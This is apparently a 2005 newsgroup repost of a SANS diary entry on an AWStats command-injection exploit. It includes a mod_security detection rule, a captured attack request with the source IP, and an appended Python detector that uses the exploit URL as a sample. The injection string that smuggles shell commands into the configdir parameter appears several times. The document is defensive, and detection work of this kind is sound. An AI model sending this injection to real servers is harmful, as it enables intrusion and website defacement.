AWStats Exploits, Port 7162/TCP and 24212/TCP traffic, spamvertised site redirected to Al'Jazeera

http://isc.sans.org/diary.php?date=2005-01-31 

***********************************************************
Quote
***********************************************************
AWStats Exploits

A couple days ago, an advisory (e.g. see Securiteam) detailed a
vulnerability in the popular web statistics package 'AWStats'. 

We got a note from Ryan Barnet earlier, who detected an exploit
attempt for this vulnerability. The traffic was flagged using
mod_security. 

The following mod_security rule was used to detect the attempt:

/awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo|

Another reader reported an incident where this attack was successful.
The attacker defaced the respective website by replacing various
'index' files. (index.htm, index.html, index.php). The web hosting
company attacked informed its clients. 

And the captured request data (I removed some lines that may reveal
too much about the attacked system): 

HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
HTTP_ACCEPT_LANGUAGE = en-us
HTTP_HOST = www.foo.com
HTTP_MOD_SECURITY_ACTION = 403
HTTP_MOD_SECURITY_MESSAGE = Access denied with code 403. Pattern match "\;id" at THE_REQUEST
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
PATH = /usr/sbin:/usr/bin
QUERY_STRING = 
REDIRECT_QUERY_STRING = configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo|
REDIRECT_REQUEST_METHOD = GET
REDIRECT_SCRIPT_URI =http://www.foo.com/awstats/awstats.pl
REDIRECT_SCRIPT_URL = /awstats/awstats.pl
REDIRECT_STATUS = 403
REDIRECT_URL = /awstats/awstats.pl
REDIRECT_mod_security_relevant = 1
REMOTE_ADDR = 200.203.166.61
REMOTE_PORT = 33165
REQUEST_METHOD = GET
REQUEST_URI = /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo|
SCRIPT_NAME = /cgi-bin/403.cgi
SCRIPT_URI =http://www.foo.com/awstats/awstats.pl
SCRIPT_URL = /awstats/awstats.pl
SERVER_ADDR = 192.168.1.100
SERVER_ADMIN = webmaster@foo.com
SERVER_NAME = www.foo.com
SERVER_PORT = 80
SERVER_PROTOCOL = HTTP/1.0
SERVER_SIGNATURE = 
TZ = US/Eastern


[...]

http://isc.sans.org/diary.php?date=2005-01-31

***********************************************************
Unquote
***********************************************************

-- 
Kayode Okeyode
http://del.icio.us/kayodeok
http://www.kayodeok.co.uk/weblog/
kayodeok
1/31/2005 8:08:57 PM
grc.security
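As an added example (not from the ISC diary, from mod_security, or from AWStats), here is a small Python check that applies the two detection signals discussed above to Apache-style request lines: the broad `;id` match against THE_REQUEST that the mod_security message reports, and a stricter, parameter-aware test for shell metacharacters in the `configdir` value that the exploit actually abuses. The sample request lines are constructed; the first reproduces the captured request, the third shows why the broad pattern alone produces false positives.

```python
import re
from urllib.parse import unquote

# Pattern the diary's mod_security message reports: "\;id" matched against
# THE_REQUEST, i.e. a literal ";id" after URL decoding.
MODSEC_PATTERN = re.compile(r";id")

# Shell metacharacters that never belong in an AWStats config directory name.
# The captured exploit opens its value with '|' and chains commands with ';'.
SHELL_META = re.compile(r"[|;`$&<>]")

def parse_query(query):
    """Split a query string on '&' only (';' is part of the payload, not a
    separator here) and percent-decode each name and value once."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs

def analyze_request(request_line):
    """Classify one request line ('GET /path?query HTTP/1.0').
    Returns the two independent signals plus human-readable findings."""
    method, _, rest = request_line.partition(" ")
    uri = rest.rsplit(" HTTP/", 1)[0]
    path, _, query = uri.partition("?")  # only the first '?' starts the query
    result = {"path": path, "modsec_hit": False,
              "configdir_injection": False, "findings": []}
    if MODSEC_PATTERN.search(unquote(uri)):
        result["modsec_hit"] = True
        result["findings"].append("';id' present in THE_REQUEST")
    for name, value in parse_query(query):
        if name == "configdir" and SHELL_META.search(value):
            result["configdir_injection"] = True
            result["findings"].append(f"shell metacharacters in configdir: {value!r}")
    return result

# Constructed sample request lines: the request captured in the diary, a normal
# AWStats report request, and an unrelated request whose parameter happens to
# contain ';id' (a false positive for the broad THE_REQUEST pattern).
SAMPLE_REQUESTS = [
    "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|"
    "?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0",
    "GET /awstats/awstats.pl?config=www.foo.com&lang=en HTTP/1.1",
    "GET /search.pl?q=valid;identity HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        r = analyze_request(line)
        print(r["path"], "modsec:", r["modsec_hit"], "configdir:", r["configdir_injection"])
```

The third sample trips the broad `;id` pattern but not the `configdir` check, which is the usual argument for anchoring a rule on the vulnerable parameter rather than on a substring of the whole request.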